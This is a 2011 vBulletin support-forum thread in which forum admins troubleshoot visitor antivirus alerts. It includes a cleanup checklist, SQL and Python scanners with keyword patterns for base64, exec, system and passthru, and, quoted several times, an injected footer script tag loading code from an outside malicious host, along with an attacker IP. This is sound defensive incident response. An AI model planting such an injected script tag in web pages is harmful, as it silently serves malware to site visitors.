Forums triggering virus alerts
  • eJM (Senior Member) replied:
    Originally posted by Wayne Luke:
        Finally, make sure your vBulletin is up to date. Currently this is version 4.1.9.
    Thanks for the help, Wayne. But please remember this forum is the vBulletin 3.8 Questions, Problems and Troubleshooting forum. None of us seeking support here are using anything greater than that version.

    Jim


  • Wayne Luke (vBulletin Technical Support Lead) replied:
    Common insertion of virus warnings is they alter the footer template and replace the connection-min.js file in clientscript/yui/connection folder.

    To find exploits embedded in your system you can follow these steps:

    1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons.

    2) Check the config.php for any suspicious code. It isn't checked by the suspect file diagnostic.

    3) Search all templates for iframe tags. They should only appear in the following templates: bbcode_video, editor-ie.css, member.css, stylegenerator.css, vbcms.css, vbulletin.css, help_bbcodes, humanverify_recaptcha, search_common, and search_common_select_type

    4) Check all your plugins for rogue include, require, include_once, or require_once code. All files should come from your server and be known to you.

    5) Check your plugins for any base64 code. I recommend against using any plugins or products that include base64 code in them. However some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.

    6) Make sure that your plugins do not include calls to exec(), system(), or pass_thru() or iframes. These are also often signs of a hacked site.

    Query for steps 4 and 5:
    -- PHP spells the function passthru(), so that is the pattern searched for here.
    SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE '%base64%' OR phpcode LIKE '%exec%' OR phpcode LIKE '%system%' OR phpcode LIKE '%passthru%' OR phpcode LIKE '%iframe%';

    7) Run this query:
    SELECT styleid, title, template FROM template WHERE template LIKE '%base64%' OR template LIKE '%exec%' OR template LIKE '%system%' OR template LIKE '%passthru%' OR template LIKE '%iframe%';

    It checks the templates for compromising code.

    8) Check .htaccess to make sure there are no redirects there.

    Finally, make sure your vBulletin is up to date. Currently this is version 4.1.9.

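A scripted form of steps 3 to 7, added here as an example (it is not code from this thread or from vBulletin): it runs the iframe allowlist and the plugin/template keyword checks over rows shaped like the results of the two queries, with constructed sample rows standing in for a database dump, and goes one step further by flagging any <script src> that loads from a host not on a trusted list. The row shapes, the trusted_hosts parameter and the regular expressions are assumptions.

```python
import re
# Templates in which vBulletin 3.8 legitimately carries an <iframe> (step 3 above).
IFRAME_ALLOWED = {
    "bbcode_video", "editor-ie.css", "member.css", "stylegenerator.css", "vbcms.css",
    "vbulletin.css", "help_bbcodes", "humanverify_recaptcha", "search_common",
    "search_common_select_type",
}
# Markers from steps 4-7; PHP spells the function passthru(), so both spellings are matched.
PLUGIN_PATTERNS = {
    "base64": re.compile(r"base64_(?:de|en)code", re.I),
    "shell": re.compile(r"\b(?:exec|system|passthru|pass_thru|shell_exec)\s*\(", re.I),
    "remote_include": re.compile(
        r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"]?(?:https?|ftp)://", re.I),
}
IFRAME_RE = re.compile(r"<iframe\b", re.I)
SCRIPT_SRC_RE = re.compile(r"<script[^>]+src=['\"]?(?:https?:)?//([^/'\"]+)", re.I)

def scan_plugins(rows):
    """rows: (title, phpcode, hookname, product) tuples. Returns [(title, reason)]."""
    hits = []
    for title, phpcode, _hook, _product in rows:
        for reason, pat in PLUGIN_PATTERNS.items():
            if pat.search(phpcode):
                hits.append((title, reason))
    return hits

def scan_templates(rows, trusted_hosts=()):
    """rows: (styleid, title, template) tuples. Flags an <iframe> in any template not on
    the allowlist, and any <script src> loaded from a host not in trusted_hosts."""
    hits = []
    for styleid, title, template in rows:
        if IFRAME_RE.search(template) and title not in IFRAME_ALLOWED:
            hits.append((styleid, title, "iframe"))
        for m in SCRIPT_SRC_RE.finditer(template):
            host = m.group(1).lower()
            if host not in trusted_hosts:
                hits.append((styleid, title, "script:" + host))
    return hits

# Constructed sample rows shaped like the two query results; the footer row carries the injected tag quoted elsewhere in this thread.
SAMPLE_PLUGINS = [
    ("Thread Tools", "$tools = array();", "showthread_start", "vbulletin"),
    ("Rogue", "eval(base64_decode('aGVsbG8='));", "global_start", "vbulletin"),
]
SAMPLE_TEMPLATES = [
    (1, "footer", '<form action="$vboptions[forumhome].php" method="get">'
     '<script type="text/javascript" src="http://www.pageviewapi.com/icons/icons.php"></script>'),
    (1, "bbcode_video", '<iframe src="$url"></iframe>'),
]
```

Run it against real rows by feeding the output of the two queries to scan_plugins and scan_templates, and pass your own CDN or ad hosts as trusted_hosts so only unexpected script sources are reported.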

  • eJM (Senior Member) replied:
    I have gotten several malware warnings over the last few weeks. I can't find a problem anywhere, but have read a number of complaints blaming Google Adsense ads. Most of those complaints have been going on in the Google help forums. This is not the only time it has happened. https://www.google.com/search?q=adse...ient=firefox-a


  • MarkTTU (New Member) replied:
    I would love to figure it out as well. I'm going to try disabling all advertising today and see what happens. I really don't suspect Google, but I'm running out of things to try.

    We have about 5k uniques a day and maybe 2-3 reporting issues. Thing is, they're running IE7, IE8, IE9, and FF, so it's not as isolated as I'd originally thought...


  • 45Wheelgun (Member) replied:
    Our forum has been dealing with this since December 11. We have had 25-30 people over 16 days report issues. We are a mid-sized board with 20,000+ uniques per day. Out of 20k uniques per day, 1 or 2 of them report either getting a virus, or having their virus software notify them that a virus was blocked. That is .005% of our unique visitors reporting issues. Of course all of them claim it only happens when they visit our website.

    We run on dedicated servers which have been checked, rechecked and then checked again. We have compared our files with the maintenance tools as well as our templates. I have had a group of people running Fiddler2 for days and none of us has seen anything.

    I would love to figure this one out. I would like to know why it only bothers a small fraction of my users.


  • MarkTTU (New Member) replied:
    Originally posted by creativepart:
        You might want to check out http://www.fiddler2.com/fiddler2/ and see if that helps.
    Been playing around with the forum with Fiddler2 and have yet to find anything. Could it be that these guys got infected somewhere else and it gets triggered when they visit a VB site?


  • Wardsweb (Member) replied:
    Originally posted by Simon Lloyd:
        You shouldn't have a problem with following Trevor's suggestion unless you have modified vBulletin core files; if you haven't, then nothing that you have done to your forum mods, templates, CSS or database will change. If you do have an issue it could potentially be scraping data from your database, including emails, passwords and anything else that's stored.

        I know because I have just helped another forum owner out that had been infected through a poorly secured modification (it's been fixed now at vb.org) which allowed the attacker to upload an extra file to the includes folder, which in turn gets ALL the information of that server, and I mean everything!
    We are on a dedicated server, so I had the server company replace all the templates from a backup. We back up the site daily and used one from 30 days ago to retrieve the files. Still there are a couple of posts after the reinstall of people being hit. Whatever it is, it is very nasty, taking over their computers to the point of having to reformat or reinstall from a cloned drive or backup.


  • creativepart (Senior Member) replied:
    When we had this issue I downloaded and installed Fiddler2 on my desktop computer. This little free program runs in a separate window and lists every file, function and script called while your page loads. I couldn't "see" any problems on my site until I loaded this and watched a page load. That's when I started seeing some script at alltagcloud.info loading with each page load. And, since Fiddler2 shows everything loading in order I could see that the script was being called near or in the footer which narrowed down the search. We were surprised to find the script was actually named something different than alltagcloud.info and I'd guess they have multiple versions of this with different names. Initially something named "pageviewapi.com" sounding fairly normal for the standard VB footer code.

    You might want to check out http://www.fiddler2.com/fiddler2/ and see if that helps.


  • MarkTTU (New Member) replied:
    We have a few members grumbling about this as well, but thus far I haven't been able to find a thing. I've even tried accessing the site from inside a VM with virgin XP and 7 installs and no protection of any kind hoping to get some kind of infection, but haven't managed to infect myself.

    I did look and couldn't find any reference to www.pageviewapi.com anywhere.


  • Wardsweb (Member) replied:
    Many members have referenced the Toolkit and this IP address 178.17.163.189. The domain name may change but the IP is the same. Even with this IP set 178.17.163. in the .htaccess, some are still getting hit.

    Even the hosting company is trying to find where this is being launched to no avail.


  • Wardsweb (Member) replied:
    Originally posted by creativepart:
        We found it on our system. Look for this code:
        Code:
        <script type="text/javascript" src="http://www.pageviewapi.com/icons/icons.php"></script>
        We found it in the Footer -- right after the
        Code:
        <form action="$vboptions[forumhome].php" method="get">
    Thanks - I looked but not found.


  • creativepart (Senior Member) replied:
    We found it on our system. Look for this code:
    Code:
    <script type="text/javascript" src="http://www.pageviewapi.com/icons/icons.php"></script>
    We found it in the Footer -- right after the
    Code:
    <form action="$vboptions[forumhome].php" method="get">


  • creativepart (Senior Member) replied:
    A lot of forums suddenly started having issues yesterday. Our users suddenly have to hit their "back" button multiple times to move back one page. Seems that MS IE users are complaining exclusively, but I'm not positive. My users have pointed out issues with some file called www.alltagcloud.info/icons/index.html. I network with a couple of dozen other VB forum admins; they started seeing this yesterday as well. They are thinking it's some Adsense ad possibly.
    Last edited by creativepart; Sun 18 Dec '11, 4:10pm.


  • syrus.xl (Senior Member) replied:
    Hi,

    Sounds like you have an iframe sql injection. It can be in your templates, but not always - it varies.

    Checking your source code may or may not find it either. Download Developer Tools for Firefox, then check Generated Source Code; this will show up any hidden source code that you normally will not see. Once you find which template it is, just hit Save on that template and it will remove any injected code.

    Re-uploading all vBulletin core files will not always correct this problem if the person has hidden 'backdoor' files in your vBulletin, in which case check your Suspect Files for Base64 coding, or additional encoded JavaScript files, all of which will 'kill' your forum eventually.

    Leaving 'backdoor' files in vBulletin or any script will not stop a malicious attack even if you are running the latest vBulletin with all patches. Blocking IPs in your .htaccess file will just cause your forum to respond slower after a while, since each IP will be checked before allowing access.

    Regards,


  • Simon Lloyd (Senior Member) replied:
    Originally posted by Wardsweb:
        While only about 10 of the 116,000 members have problems, I'm not going to be too worried about it. Reloading the site would be the last option. There are a lot of modules, graphic and monetary changes to the site making a reload a not so simple task.
    You shouldn't have a problem with following Trevor's suggestion unless you have modified vBulletin core files; if you haven't, then nothing that you have done to your forum mods, templates, CSS or database will change. If you do have an issue it could potentially be scraping data from your database, including emails, passwords and anything else that's stored.

    I know because I have just helped another forum owner out that had been infected through a poorly secured modification (it's been fixed now at vb.org) which allowed the attacker to upload an extra file to the includes folder, which in turn gets ALL the information of that server, and I mean everything!

